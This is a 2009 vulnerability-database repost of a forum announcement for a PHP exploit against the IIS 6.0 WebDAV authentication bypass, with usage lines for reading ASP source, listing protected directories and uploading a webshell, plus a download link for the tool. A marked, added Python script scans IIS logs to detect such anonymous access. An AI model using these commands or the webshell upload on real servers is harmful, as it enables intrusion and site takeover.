IIS 6 WebDAV exploit published, PHP shell version - Vulnerability Warning - Black Bar Safety Net

2009-05-25T00:00:00
ID MYHACK58:62200923363
Type myhack58
Reporter Anonymous
Modified 2009-05-25T00:00:00

Description


By racle@tian6.com && securiteweb.org. Source: www.tian6.com && www.securiteweb.org

Videos and related presentations on the IIS 6.0 WebDAV vulnerability have been on the forum for several days. Yesterday milw0rm.com also published a C version of the exploit program. I don't know how well it works; I haven't used it. Now tian6.com is the first in China to publish a script-based EXP.

In fact, the day before yesterday I just wanted to write an EXP that doesn't need to be compiled. Unfortunately I had no environment at hand, and building one was too much trouble, so yesterday I found a friend and we finished this EXP together. Already announced

Instructions: (for the specific use or test method, please refer to the day the male made the video.)

```
* IIS 6 WEBDAV Exploit. By racle@tian6.com && Securiteweb.org *
Usage: php '.$argv[0].' source/path/put host path
Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp
Example2: php '.$argv[0].' path www.tian6.com /secret/
Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt (evil code as test.txt)
```


Examples:

php.exe i.php source www.tian6.com /blog/readme.asp // view the source code of readme.asp in the protected directory blog on tian6.com.

php.exe i.php path www.tian6.com /secret/ // view all directories inside the protected directory secret on tian6.com.

php.exe i.php put www.tian6.com /secret/ test.txt // test.txt sits in the same folder as i.php and contains your WEBSHELL. The command means: on www.tian6.com, read the content of the local file test.txt and write it into the protected directory secret. The default file name is racle.asp. There is one problem, though: the secret directory is protected, so a file written into it apparently cannot be run. There is a very simple trick for this; watch the video carefully.
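A defender-side check for the three actions described above (reading source, listing a directory, and writing a file in a protected directory without logging in), as an added example that is not from the original post: it scans an IIS W3C extended log for successful requests to protected paths that carry no authenticated user name. The log lines are constructed, and `PROTECTED_PREFIXES` and `WRITE_VERBS` are assumptions to adapt to the site being reviewed.

```python
# Added example: flag successful anonymous requests to directories that
# should require authentication, using an IIS W3C extended log.
WRITE_VERBS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}  # assumption
PROTECTED_PREFIXES = ("/secret/", "/blog/")  # hypothetical auth-required dirs

# Constructed sample log (not taken from the original page).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2009-05-25 10:00:01 GET /index.asp - 192.0.2.10 200
2009-05-25 10:00:05 PROPFIND /secret/ - 192.0.2.66 207
2009-05-25 10:00:09 PUT /secret/racle.asp - 192.0.2.66 201
2009-05-25 10:00:12 PUT /secret/report.doc CORP\\alice 192.0.2.20 201
2009-05-25 10:00:15 PROPFIND /secret/ - 192.0.2.77 401
2009-05-25 10:00:20 GET /blog/readme.asp - 192.0.2.66 200
"""


def parse_w3c(text):
    """Yield one dict per request, named by the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip malformed rows
                yield dict(zip(fields, values))


def classify(method):
    """Map the verb to the kind of access it represents."""
    if method in WRITE_VERBS:
        return "write"
    return "listing" if method == "PROPFIND" else "read"


def find_unauthenticated_access(text):
    """Return (kind, client_ip, method, path) for each suspicious request."""
    findings = []
    for req in parse_w3c(text):
        path = req["cs-uri-stem"].lower()  # IIS paths are case-insensitive
        anonymous = req["cs-username"] == "-"
        succeeded = req["sc-status"].startswith("2")
        if anonymous and succeeded and path.startswith(PROTECTED_PREFIXES):
            method = req["cs-method"].upper()
            findings.append((classify(method), req["c-ip"], method, req["cs-uri-stem"]))
    return findings


if __name__ == "__main__":
    for finding in find_unauthenticated_access(SAMPLE_LOG):
        print(*finding)
```

Any hit means a request reached a protected directory without credentials and was served; "write" hits call for checking the directory for unexpected files.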

![](http://img37.imageshack.us/img37/2741/74571035.jpg)

![](http://img29.imageshack.us/img29/6510/passsource.jpg)

![](http://img36.imageshack.us/img36/6304/passpath.jpg)

![](http://img132.imageshack.us/img132/1606/passput.jpg)

PHPSHELL download address: http://l14of.ys168.com/note/fd.htm?http://ys-B.ys168.com/?i.rar_4s7bsn0d6e0bs7bsn0cl1btomq0cpn2bit7b5btomojkiu14z97f14z